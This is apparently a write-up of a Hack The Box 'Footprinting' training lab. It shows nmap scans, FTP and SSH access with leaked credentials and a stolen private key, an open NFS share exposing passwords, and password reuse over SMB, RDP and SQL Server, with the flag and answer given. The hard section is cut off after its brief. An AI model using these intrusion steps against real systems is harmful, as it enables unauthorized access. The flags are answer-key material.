FOOTPRINTING
FOOTPRINTING LAB: EASY
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.
The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials "ceil:qwer1234", and they pointed out that some of the company's employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
root@htb:~$ sudo nmap -sS -T4 10.129.43.46 -p- -oA targetServices
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftproot@htb:~$ sudo nmap -sV -sC -T4 10.129.43.46 -p 21,22,53,2121 -oA targetServicesFull
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp ProFTPD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@htb:~$ ftp 10.129.43.46
Connected to 10.129.43.46.
220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.43.46]
Name (10.129.43.46:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||57361|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete
root@htb:~$ ftp 10.129.43.46 -P 2121
Connected to 10.129.43.46.
220 ProFTPD Server (Ceil's FTP) [10.129.43.46]
Name (10.129.43.46:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||8950|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer completeroot@htb:~$ ftp> cd .ssh
250 CWD command successful
ftp> pwd
Remote directory: /.ssh
ftp> ls -la
229 Entering Extended Passive Mode (|||34025|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||46706|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*************************************************************************************************************************************************| 3381 1.92 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (310.66 KiB/s)
ftp>
root@htb:~$ mv id_rsa target-id_rsa
root@htb:~$ sh -i target-id_rsa [email protected]
hostkeys_find_by_key_hostfile: hostkeys_foreach failed for /home/htb-ac-53539/.ssh/known_hosts: Not a directory
The authenticity of host '10.129.43.46 (10.129.43.46)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/htb-ac-53539/.ssh/known_hosts).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'target-id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "target-id_rsa": bad permissions
[email protected]: Permission denied (publickey).
root@htb:~$ chmod 600 target-id_rsa
root@htb:~$ ssh -i target-id_rsa [email protected]
hostkeys_find_by_key_hostfile: hostkeys_foreach failed for /home/htb-ac-53539/.ssh/known_hosts: Not a directory
The authenticity of host '10.129.43.46 (10.129.43.46)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 08 Dec 2025 12:48:40 AM UTC
System load: 0.11 Processes: 161
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.43.46
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$
ceil@NIXEASY:~$ find / -name "flag.txt" -type f 2>/dev/null
/home/flag/flag.txt
ceil@NIXEASY:~$ cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}FOOTPRINTING LAB: MEDIUM
This second server is a server that everyone on the internal network has access to. In our discussion with our client, we pointed out that these servers are often one of the main targets for attackers and that this server should be added to the scope.
Our customer agreed to this and added this server to our scope. Here, too, the goal remains the same. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB has been created. Accordingly, we need to obtain the credentials of this user as proof.
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
root@htb:~$ sudo nmap -sS -sV -sC -T4 10.129.202.41 -p-
PORT STATE SERVICE VERSION
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINMEDIUM
| NetBIOS_Domain_Name: WINMEDIUM
| NetBIOS_Computer_Name: WINMEDIUM
| DNS_Domain_Name: WINMEDIUM
| DNS_Computer_Name: WINMEDIUM
| Product_Version: 10.0.17763
|_ System_Time: 2025-12-15T00:30:40+00:00
|_ssl-date: 2025-12-15T00:30:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2025-12-13T23:23:21
|_Not valid after: 2026-06-14T23:23:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-15T00:30:41
|_ start_date: N/A
root@htb:~$ sudo nmap --script=vuln -T4 10.129.202.41 -p 111,135,139,445,2049,3389,5985,47001,49664-49667,49678-49681
PORT STATE SERVICE
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERRORroot@htb:~$ sudo nmap --script nfs* 10.129.202.41 -p 111,2049
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /TechSupport
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwx------ 4294967294 4294967294 65536 2021-11-11T00:09:49 .
| ?????????? ? ? ? ? ..
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283649.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283650.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283651.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283652.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283653.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283654.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:29 ticket4238791283655.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:29 ticket4238791283656.txt
|_
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /TechSupport 25468924.0 15097604.0 10371320.0 60% 16.0T 1023
| nfs-showmount:
|_ /TechSupport
2049/tcp open nfs
root@oco:~$ showmount -e 10.129.202.41
Export list for 10.129.202.41:
/TechSupport (everyone)
root@oco:~$ mkdir targetNFS
root@oco:~$ sudo mount -t nfs 10.129.202.41:/TechSupport ./targetNFS/ -o nolock
root@oco:~$ cd targetNFS
bash: cd: targetNFS/: Permission denied
root@oco:~$ sudo su
root@oco:~$ cd targetNFS/
root@oco:~$ ls
ticket4238791283649.txt ticket4238791283671.txt ticket4238791283693.txt ticket4238791283715.txt ticket4238791283737.txt ticket4238791283759.txt ticket4238791283781.txt
ticket4238791283650.txt ticket4238791283672.txt ticket4238791283694.txt ticket4238791283716.txt ticket4238791283738.txt ticket4238791283760.txt ticket4238791283782.txt
ticket4238791283651.txt ticket4238791283673.txt ticket4238791283695.txt ticket4238791283717.txt ticket4238791283739.txt ticket4238791283761.txt ticket4238791283783.txt
ticket4238791283652.txt ticket4238791283674.txt ticket4238791283696.txt ticket4238791283718.txt ticket4238791283740.txt ticket4238791283762.txt ticket4238791283784.txt
ticket4238791283653.txt ticket4238791283675.txt ticket4238791283697.txt ticket4238791283719.txt ticket4238791283741.txt ticket4238791283763.txt ticket4238791283785.txt
ticket4238791283654.txt ticket4238791283676.txt ticket4238791283698.txt ticket4238791283720.txt ticket4238791283742.txt ticket4238791283764.txt ticket4238791283786.txt
ticket4238791283655.txt ticket4238791283677.txt ticket4238791283699.txt ticket4238791283721.txt ticket4238791283743.txt ticket4238791283765.txt ticket4238791283787.txt
ticket4238791283656.txt ticket4238791283678.txt ticket4238791283700.txt ticket4238791283722.txt ticket4238791283744.txt ticket4238791283766.txt ticket4238791283788.txt
ticket4238791283657.txt ticket4238791283679.txt ticket4238791283701.txt ticket4238791283723.txt ticket4238791283745.txt ticket4238791283767.txt ticket4238791283789.txt
ticket4238791283658.txt ticket4238791283680.txt ticket4238791283702.txt ticket4238791283724.txt ticket4238791283746.txt ticket4238791283768.txt ticket4238791283790.txt
ticket4238791283659.txt ticket4238791283681.txt ticket4238791283703.txt ticket4238791283725.txt ticket4238791283747.txt ticket4238791283769.txt ticket4238791283791.txt
ticket4238791283660.txt ticket4238791283682.txt ticket4238791283704.txt ticket4238791283726.txt ticket4238791283748.txt ticket4238791283770.txt ticket4238791283792.txt
ticket4238791283661.txt ticket4238791283683.txt ticket4238791283705.txt ticket4238791283727.txt ticket4238791283749.txt ticket4238791283771.txt ticket4238791283793.txt
ticket4238791283662.txt ticket4238791283684.txt ticket4238791283706.txt ticket4238791283728.txt ticket4238791283750.txt ticket4238791283772.txt ticket4238791283794.txt
ticket4238791283663.txt ticket4238791283685.txt ticket4238791283707.txt ticket4238791283729.txt ticket4238791283751.txt ticket4238791283773.txt ticket4238791283795.txt
ticket4238791283664.txt ticket4238791283686.txt ticket4238791283708.txt ticket4238791283730.txt ticket4238791283752.txt ticket4238791283774.txt ticket4238791283796.txt
ticket4238791283665.txt ticket4238791283687.txt ticket4238791283709.txt ticket4238791283731.txt ticket4238791283753.txt ticket4238791283775.txt ticket4238791283797.txt
ticket4238791283666.txt ticket4238791283688.txt ticket4238791283710.txt ticket4238791283732.txt ticket4238791283754.txt ticket4238791283776.txt ticket4238791283798.txt
ticket4238791283667.txt ticket4238791283689.txt ticket4238791283711.txt ticket4238791283733.txt ticket4238791283755.txt ticket4238791283777.txt ticket4238791283799.txt
ticket4238791283668.txt ticket4238791283690.txt ticket4238791283712.txt ticket4238791283734.txt ticket4238791283756.txt ticket4238791283778.txt ticket4238791283800.txt
ticket4238791283669.txt ticket4238791283691.txt ticket4238791283713.txt ticket4238791283735.txt ticket4238791283757.txt ticket4238791283779.txt ticket4238791283801.txt
ticket4238791283670.txt ticket4238791283692.txt ticket4238791283714.txt ticket4238791283736.txt ticket4238791283758.txt ticket4238791283780.txt
root@oco:~$ tree .
.
├── ticket4238791283649.txt
├── ticket4238791283650.txt
├── ticket4238791283651.txt
├── ticket4238791283652.txt
...
root@oco:~$ cat *
Conversation with InlaneFreight Ltd
Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:
1smtp {
2 host=smtp.web.dev.inlanefreight.htb
3 #port=25
4 ssl=true
5 user="alex"
6 password="lol123!mD"
7 from="[email protected]"
8}
9
10securesocial {
11
12 onLoginGoTo=/
13 onLogoutGoTo=/login
14 ssl=false
15
16 userpass {
17 withUserNameSupport=false
18 sendWelcomeEmail=true
19 enableGravatarSupport=true
20 signupSkipLogin=true
21 tokenDuration=60
22 tokenDeleteInterval=5
23 minimumPasswordLength=8
24 enableTokenJob=true
25 hasher=bcrypt
26 }
27
28 cookie {
29 # name=id
30 # path=/login
31 # domain="10.129.2.59:9500"
32 httpOnly=true
33 makeTransient=false
34 absoluteTimeoutInMinutes=1440
35 idleTimeoutInMinutes=1440
36 }
---
root@htb:~$ sudo umount /home/htb-ac-53539/targetNFS
umount.nfs4: /home/htb-ac-53539/targetNFS: device is busy
root@htb:~$ cd /home/htb-ac-53539
root@htb:~$ sudo umount /home/htb-ac-53539/targetNFS
root@htb:~$ exit
root@htb:~$ smbmap -H 10.129.202.41
[!] Authentication error on 10.129.202.41
root@htb:~$ smbmap -H 10.129.202.41 -u 'alex' -p 'lol123!mD'
[+] IP: 10.129.202.41:445 Name: 10.129.202.41
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
devshare READ, WRITE
IPC$ READ ONLY Remote IPC
Users READ ONLY
root@htb:~$ smbclient -L //10.129.202.41/ -U alex
Password for [WORKGROUP\alex]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.202.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
* if you get the error "Unable to connect with SMB1..." then simply remove the
-L from the command
- smbclient -L tries to list workgroups that requires SMB1
Modern Windows systems disable SMB1, so the fallback fails
root@htb:~$ smbclient //10.129.202.41/users -U alex%lol123!mD
root@htb:~$ smbclient //10.129.180.37/devshare -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Dec 14 20:13:58 2025
.. D 0 Sun Dec 14 20:13:58 2025
important.txt A 16 Wed Nov 10 10:12:55 2021
6367231 blocks of size 4096. 2592726 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
root@htb:~$ cat important.txt
sa:87N1ns@slls83root@htb:~$ xfreerdp3 /u:alex /p:'lol123!mD' /v:10.129.130.86
[20:30:00:477] [196714:196715] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-53539/.config/freerdp
...
target:~$ Desktop > Microsoft SQL Server Management Studio 18 > Run as > Administrator
Password: 87N1ns@slls83
SQL Server
Server Type: Database Engine
Server Name: WINMEDIUM
Authentication: Windows Authentication
Connect...
SQL Server
Databases > Accounts > Tables > right-click dbo.devsacc
Edit Top 200 Rows
...
157 HTB lnch7ehrdn43i7AoqVPK4zWR
FOOTPRINTING LAB: HARD
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.
Last updated